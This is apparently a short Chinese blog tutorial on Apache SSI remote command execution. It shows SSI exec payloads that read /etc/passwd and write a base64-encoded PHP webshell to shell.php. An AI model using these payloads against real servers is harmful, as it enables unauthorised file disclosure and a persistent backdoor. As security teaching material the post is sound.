首页 > 其他分享 >Apache SSI 远程命令执行漏洞

Apache SSI 远程命令执行漏洞

时间:2022-10-27 11:26:20浏览次数:102  
标签:漏洞 HTML SSI Apache 远程 页面

Apache SSI 远程命令执行漏洞

ssi简介

SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。

例如,您可以将指令放置到现有的HTML页面中,例如:

 <!--#echo var="DATE_LOCAL" -->

并且,当该页面被投放时,该片段将被评估并替换为其值:

 Tuesday, 15-Jan-2013 19:28:54 EST
 读取etc/password
 <!--#exec cmd="cat /etc/passwd" -->

也可以写入一句话木马

 <!--*#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->*

 

标签:漏洞,HTML,SSI,Apache,远程,页面
From: https://www.cnblogs.com/GTL-JU/p/16831566.html

相关文章

  • PHP session数组输出(遍历输出)
    做购物车弄的下边是存储的sessionvar_dump的结果,我想遍历数组输出里边的信息,如编号名称价格等array(size=3)'C00000013'=>array(size=5)'id'=>string......
  • PHP反序列化漏洞总结
    文章目录一、基础知识1、什么是反序列化漏洞:序列化与反序列化:1、序列化:2、反序列化:二、PHP魔法函数1、常见方法:2、安全问题:三、CTF中的反序列化例题一:例题二:四、靶场练......
  • Session的学习
    1:什么是Session?服务器会给每个用户创建一个session对象;session占一个游览器,只要游览器没有关闭,session就一直存在;2:Session和Cookie的区别?(1)Cookie是吧用户......
  • Python代码编写辅导:CSC411 Digit Classification
    全文链接:tecdat.cn/?p=29674RequirementInthisassignment,youwillcomparethecharacteristicsandperformanceofdifferentclassifiers,namelylogisticregre......
  • Java查询服务器(windows + linux)和系统各个指标数据 cpu、内存、硬盘、线程、请求错
    importjava.io.BufferedReader;importjava.io.File;importjava.io.IOException;importjava.io.InputStreamReader;importjava.lang.management.ManagementFactory......
  • java反序列化漏洞cc_link_one
    CC-LINK-one前言这里也正式进入的java的反序列化漏洞了,简单介绍一下CC是什么借用一些官方的解释:ApacheCommons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons......
  • git-2_34_1访问服务器报Permission-denied(publickey)
    起因近期git更新了最新的2.34.1版本,好多小伙伴突然发现无法访问服务器。gitpull的时候命令行会提示 git@git.xxxxx.com:Permissiondenied(publickey,gssapi-......
  • git-2_34_1访问服务器报Permission-denied(publickey)
    起因近期git更新了最新的2.34.1版本,好多小伙伴突然发现无法访问服务器。gitpull的时候命令行会提示 git@git.xxxxx.com:Permissiondenied(publickey,gssapi-......
  • appium使用name定位报错 Locator Strategy 'name' is not supported for this session
    报错提示:LocatorStrategy'name'isnotsupportedforthissession解决:1.打开本地文件 driver.js(路径:C:\Users\wangzhiqiang(这里改为自己的用户名)\AppData\Local\Progr......
  • Session学习
    Java中Session的用法和(Cookies)一、Session介绍在WEB开发中,服务器可以为每个用户浏览器创建一个会话对象(session对象),注意:一个浏览器独占一个session对象(默认情况下)。......